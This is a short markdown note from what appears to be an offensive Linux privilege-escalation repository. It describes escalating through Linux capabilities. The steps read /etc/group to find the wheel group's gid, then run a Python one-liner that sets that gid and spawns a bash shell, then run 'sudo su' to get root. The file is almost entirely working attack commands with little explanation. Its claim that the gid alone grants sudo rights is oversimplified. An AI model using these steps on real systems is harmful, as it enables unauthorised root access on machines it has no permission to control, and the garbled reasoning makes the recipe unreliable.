akashsparsh17/Offensive-Linux-Privilege-Escalation/Escalate-via-capabilities.md

 #### Exploiting

+- by this we are checking group by which we can have power e.g suod or wheel, shadow
 ```bash
 cat /etc/group
 ```
+- as we see the wheel group which will give us sudo rights, now we know the `gid` of the group
 ```bash
 wheel:x:10:
 ```

+- by using the gid we are assigning ourselves that group
 ```bash
 python -c 'import os; os.setgid(10); os.system("/bin/bash")'
 ```

+- cuz we have sudo rights, by the command we will be root
 ```bash
 sudo su
 ```